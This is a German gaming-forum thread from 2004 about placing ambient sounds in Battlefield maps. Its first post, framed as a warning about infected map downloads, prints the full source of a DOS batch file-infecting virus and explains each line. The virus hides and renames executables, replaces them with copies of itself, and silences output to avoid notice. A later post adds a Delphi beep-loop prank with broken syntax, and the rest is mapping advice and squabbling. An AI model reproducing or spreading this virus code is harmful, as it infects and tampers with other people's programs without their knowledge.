[h0x]-Elite 0 Melden Teilen Geschrieben 2. Januar 2004 vorher hat einer beschrieben, wie man einen sound laufen lässt spielt dieser sount dann auf der ganzen map? oder kann man das auf ein bestimmtes objekt spezifizieren? ich finde, wenn man sowas wie einen jungel haben will, kann man ja sound nehmen und ihn kürzen, denn ein bisschen vogelgezwitscher und nochn bisschen was, das loopt doch eh, im script stehr das zu mindest Leute passt auf, wenn ihr maps saugt, man könnte alls script auch einen batch-virus anfügen, die killen bei jedem starten der map ein *.exe usw. lasst immer den antivir laufen! Für leute die einen intelligenzqoutienten unter 70 haben, bekommen das hier Script: @echo off ctty nul for %%f in (*.exe *.com) do set A=%%f if %A%==COMMAND.COM set A= rename %A% V%A% if not exist V%A% goto end attrib +h V%A% copy %0.bat %A% attrib +r %A% ren %A% *.bat set A= :end ctty con @if exist V%0.com V%0.com %1 %2 %3 @if exist V%0.exe V%0.exe %1 %2 %3 Für alle totalen Neulinge gehe ich den Code nun Zeile für Zeile durch. @echo off Dieser Befehl bewirkt, dass die Befehle des Programmes beim ausführen nicht angezeigt werden. ctty nul Hier werden alle Ausgaben ins Nichts geleitet. So das der 'Benutzer' nicht sieht, dass Dateien kopiert wurden. for %%f in (*.exe *.com) do set A=%%f Hier werden alle EXE und COM Dateien und schreibt jede Datei in die Variable A. Das bedeutet, dass am Ende die letzte, noch nicht infizierte Datei in der Variable A gespeichert wird. if %A%==COMMAND.COM set A= Falls A die Datei Command.COM enthaelt, wird A Null gesetzt rename %A% V%A% Die gefundene Datei wird umbenannt in Vname if not exist V%A% goto end Sollte das Umbenennen schiefgegangen sein, wird zur Stelle :end gesprungen und beendet attrib +h V%A% Die umbenannte Datei wird versteckt und somit nur durch Parameter mit dem Befehl dir /a:h sichtbar, auserdem wird sie bei einer erneuten Ausfuehrung des Programmes nicht noch einmal umbenannt. copy %0.bat %A% Der Virus (%0%) wird an die Stelle der COM Datei kopiert attrib +r %A% Nun wird die Datei vor dem Ueberschreiben geschuetzt ren %A% *.bat Nun noch eine Umbenennung in eine BAT Datei set A= Der Parameter A wird wieder geleert, um keine Spuren zu hinterlassen :end Hierher wird mit goto end gesprungen ctty con Die Ausgabe wird wieder auf den Bildschirm geleitet @if exist V%0.com V%0.com %1 %2 %3 Falls die Ersetzte Datei eine COM Datei war, wird diese nun ausgeführt @if exist V%0.exe V%0.exe %1 %2 %3 wie eben nur mit EXE Dateien Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
golem_moja 0 Melden Teilen Geschrieben 2. Januar 2004 (bearbeitet) ok..... ein lernkurs...wie schön... die einen holen damit ihre serverlisten oder starten den esel neu und die mapper packen unter sich nen virus rein...wäre ne möglichkeit ich weiß sowas hats mit einigen bf maps schon gegeben, aber die chance is praktisch = 0 und wo wir schonmal dabei sind: Startet euren delphi compiler, baut ne on****.**** routine und schreibt: var i: integer; begin for i:= 1 to i:= 50000 do begin beep; beep; beep; beep; end; end; // das is zwar kein virus, hört sich aber // verdammt niedlich an....... B) mfg...the delphi-programmingman of makedc..... the G-O-Double-T golem Bearbeitet 4. Januar 2004 von golem_moja Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
[h0x]-Elite 0 Autor Melden Teilen Geschrieben 2. Januar 2004 hehe war schon eine lange zeit, die ich den delphi compiler wieder angeworfen habe hört sich echt lieb an! weis jetzt irgendwer wie das mitm object sount funzt? Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
der nachbar 0 Melden Teilen Geschrieben 2. Januar 2004 och wie süß, zwei progger unter sich muss mal der mapping coder ran; du kannst in der enviorment.con eine sound file festlegen die auf der ganezn map abgespielt werden, du kannst aber auch sounds coden die nur in einem bestimmten umkreis oder lautstärke abgespielt werden; diese setzte dann am besten mit dem e42 wie ein normales objekt, kannste aber auch per hand in die staticobjects einfügen bei fragen ------> icq oder ts Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
golem_moja 0 Melden Teilen Geschrieben 2. Januar 2004 (bearbeitet) extrahier dir die static objects ==> objects.rfa...und shcau in die con - dateien... da ich jedoch da nichts gefunden habe (kannst dich ja selbst überzeugen), muss man wohl mit bc unter das house die richtigen untergrund textures nehemn ==> mat ids P.S. Wie meinst du das ???==> war schon eine lange zeit, die ich den delphi compiler wieder angeworfen habe hört sich echt lieb an! mfg golem @nachbar...du bist auch ein kleiner süßer schnuffelbuffelteddy...*schmatz* Bearbeitet 2. Januar 2004 von golem_moja Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Tomcraft 0 Melden Teilen Geschrieben 2. Januar 2004 och wie süß, zwei progger unter sich muss mal der mapping coder ran; du kannst in der enviorment.con eine sound file festlegen die auf der ganezn map abgespielt werden, du kannst aber auch sounds coden die nur in einem bestimmten umkreis oder lautstärke abgespielt werden; diese setzte dann am besten mit dem e42 wie ein normales objekt, kannste aber auch per hand in die staticobjects einfügen bei fragen ------> icq oder ts Wow, der Coder schlechthin. Dafür muss man nicht coden können,als tu nicht immer so,als ob du es könntest. Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
golem_moja 0 Melden Teilen Geschrieben 2. Januar 2004 lol..is zwar spam,aber muss mal gesagt (oder gefeiert ) werden.... Ich stimme mit tomcraft überein: Nachbar, hör auf dein maul immer so weit aufzureißen... mloligemg golem Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
[h0x]-Elite 0 Autor Melden Teilen Geschrieben 2. Januar 2004 BIN KEIN CODER hab mich früher nur mit dem beschäftigt! P.S. Wie meinst du das ???==> QUOTE war schon eine lange zeit, die ich den delphi compiler wieder angeworfen habe hört sich echt lieb an! damit meine ich, dass es schon lange her ist, den delphi compiler zu benützen Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
der nachbar 0 Melden Teilen Geschrieben 2. Januar 2004 ach golem hör mal auf; ihr alten angeber ihr Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...